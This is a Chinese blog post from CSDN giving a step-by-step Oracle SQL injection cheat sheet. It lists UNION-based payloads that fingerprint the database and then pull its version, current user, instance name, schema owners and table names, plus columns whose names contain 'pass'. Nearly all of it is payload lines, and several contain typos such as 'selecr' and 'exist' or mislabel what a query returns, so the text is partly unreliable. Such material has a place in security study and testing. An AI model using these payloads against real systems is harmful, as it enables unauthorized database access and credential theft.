sql注入oracle(1)

最新推荐文章于 2024-05-20 21:14:17 发布

独梧锁雾

最新推荐文章于 2024-05-20 21:14:17 发布

阅读量1.7k

点赞数

文章标签： oracle sql 数据库

本文链接：https://blog.csdn.net/qq_43423320/article/details/123533943

版权

sql注入oracle

1. 判断为oracle

and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 --

2. 获取基本信息

(1) 获取字段数

order by N

(2) 获取数据库版本

and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual

在这里插入图片描述
(3)获取数据库连接名

and 1=2 union select 1,2,{select sys_context('userenv','current_user') from dual),4 from dual

在这里插入图片描述
(4)获取日志文件的绝对路径

and 1=2 union select 1,2,(select instance_name from v$instance) from dual

3. 猜测数据库名/表和列名

（1）数据库名

and 1=2 union select (select owner from all_tables where rownum =1) from dual

在这里插入图片描述
（2）依次爆出数据库名

and 1=2 union select (select owner from all_tables where rownum =1 and owner<>'sys') from dual

在这里插入图片描述
(3)爆出表名

and 1=2 union select (select table_name from user_tables where rownum =1 ) from dual

and (select column_name from user_tab_columns where column_name like '%25pass%25')>0

and 1=2 union select (select column_name from user_tab_columns where columns_name like '%25pass%25') from dual

在这里插入图片描述
(4)爆出字段名

and 1=2 union select (select column_name from user_tab_columns where table_name = 'bonus' and rownum =1 )from dual

在这里插入图片描述
(注意：表名要大写）

独梧锁雾

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sql注入oracle(1)

sql注入oracle1. 判断为oracleand exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 --2. 获取基本信息(1) 获取字段数order by N(2) 获取数据库版本and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual(3)获取数据库连
复制链接

扫一扫